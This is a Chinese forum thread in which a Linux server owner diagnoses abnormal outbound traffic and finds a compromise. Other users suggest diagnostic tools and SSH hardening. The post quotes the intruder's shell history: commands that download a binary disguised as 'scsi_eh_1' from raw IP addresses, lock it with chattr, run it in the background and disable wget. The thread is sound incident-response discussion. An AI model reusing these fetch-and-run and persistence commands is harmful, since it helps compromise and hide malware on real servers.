Linux 服务器有大量出站流量 不低于 50M/s 有没有办法查到哪个进程在搞乱
zhzhwcn · 2014-06-19 11:34:14 +08:00 · 7157 次点击这是一个创建于 3816 天前的主题,其中的信息可能已经有所发展或是发生改变。
用iftop可以看到是几个IP的7000跟7023端口在跑,但是netstat看不到这几个端口 很是奇怪 是不是被黑了
第 1 条附言 · 2014-06-19 14:44:40 +08:00
已证实被人黑了
1544 uname -a
1545 ifconfig
1546 wget http://114.80.119.132:29/ssh_auto_deny.sh
1547 wget http://122.224.32.32:51/scsi_eh_1
1548 chattr +i /etc/scsi_eh_1
1549 chattr +s /etc/scsi_eh_1
1550 chattr +a /etc/scsi_eh_1
1551 nohup /etc/scsi_eh_1 > /dev/null 2>&1 &
1552 chmod 0644 /usr/bin/wget
1553 get
1554 wgert
1555 wget
把scsi_eh_1这个删除掉就好了
1544 uname -a
1545 ifconfig
1546 wget http://114.80.119.132:29/ssh_auto_deny.sh
1547 wget http://122.224.32.32:51/scsi_eh_1
1548 chattr +i /etc/scsi_eh_1
1549 chattr +s /etc/scsi_eh_1
1550 chattr +a /etc/scsi_eh_1
1551 nohup /etc/scsi_eh_1 > /dev/null 2>&1 &
1552 chmod 0644 /usr/bin/wget
1553 get
1554 wgert
1555 wget
把scsi_eh_1这个删除掉就好了
 |
1
ultimate010 2014-06-19 11:36:55 +08:00
不科学,用root两个看到的应该匹配。
|
 |
2
zhzhwcn OP @ultimate010 所以来这里求帮助 还有没有其它的办法看到进程 查了一下IP都是福建那边的IP
|
 |
3
molinxx 2014-06-19 11:40:43 +08:00 via iPhone
福建莆田的垃圾信息团队么?
|
 |
4
rrfeng 2014-06-19 11:44:56 +08:00
lsof
|
|
5
zhzhwcn OP NetHogs version 0.8.0
PID USER PROGRAM DEV SENT RECEIVED 3368 root /etc/scsi_eh_1 eth0 0.054 0.092 KB/sec 2903 root sshd: root@pts/0 eth0 0.147 0.047 KB/sec 3593 root sshd: root@pts/1 eth0 0.652 0.047 KB/sec ? root 106.186.27.187:80-49.65.129.69:62729 0.011 0.023 KB/sec ? root 106.186.27.187:10755-117.27.248.5:7000 0.205 0.000 KB/sec ? root 106.186.27.187:10754-117.27.248.5:7000 0.204 0.000 KB/sec ? root 106.186.27.187:10753-117.27.248.5:7000 0.204 0.000 KB/sec ? root 106.186.27.187:10752-117.27.248.5:7000 0.204 0.000 KB/sec ? root 106.186.27.187:10751-117.27.248.5:7000 0.203 0.000 KB/sec ? root 106.186.27.187:10750-117.27.248.5:7000 0.203 0.000 KB/sec ? root 106.186.27.187:10749-117.27.248.5:7000 0.202 0.000 KB/sec ? root 106.186.27.187:10748-117.27.248.5:7000 0.202 0.000 KB/sec ? root 106.186.27.187:10747-117.27.248.5:7000 0.202 0.000 KB/sec ? root 106.186.27.187:10746-117.27.248.5:7000 0.201 0.000 KB/sec ? root 106.186.27.187:10745-117.27.248.5:7000 0.201 0.000 KB/sec 这是NetHogs的输出 pid都是?不知道为什么 @molinxx @rrfeng |
|
6
zhzhwcn OP 看端口都是连续的 难道是在扫描端口?
|
 |
7
qiuai 2014-06-19 12:15:31 +08:00
我昨天被人扫端口扫了156M带宽.....IP封了一晚....
|
 |
8
Lax 2014-06-19 13:24:56 +08:00
iftop或iptraf看看是tcp还是udp
|
 |
9
tywtyw2002 2014-06-19 13:26:22 +08:00
感觉是arp吧
你试试tcpdump -c 100 看看 |
|
10
ultimate010 2014-06-19 13:28:03 +08:00
端口扫描这么吊啊,有没有简单的防范软件。@qiuai
|
 |
11
webflier 2014-06-19 13:37:19 +08:00
我把福建省的ip都block了
|
 |
12
XXOO 2014-06-19 13:38:15 +08:00
不是有 ufw 么
|
|
14
webflier 2014-06-19 14:30:43 +08:00
@sanddudu 而且是n个并发一起来,实在是吃不消啊~
我本来只封了莆田,但是后来发现福州,厦门也有很多ip过来,所以。。。。。 |
 |
16
20150517 2014-06-19 15:40:52 +08:00 via Android
前两天也发现一个南宁的ip扫描我22端口,iptables block后,又换了个邻近的ip,现在22端口绝不能开
|
 |
17
zwzmzd 2014-06-19 15:49:36 +08:00 via Android  1
@20150517 用iptables杀不干净的
1.换端口,换个自己记得住,并且10000+的端口很有效 2.禁止使用密码登录,改用证书登录,特别是root用户。或者干脆禁了root通过ssh登录,要用的时候使用别的账户su进去 |
 |
18
haijd 2014-06-19 16:39:54 +08:00
iptraf
|
|
19
qiuai 2014-06-19 18:14:59 +08:00
@ultimate010 杀IP.也没别的好办法...
|
 |
20
9hills 2014-06-19 18:50:35 +08:00
被黑了就备份数据,重装系统。。删掉一个文件接着用?lz真是勇士
|
Select Language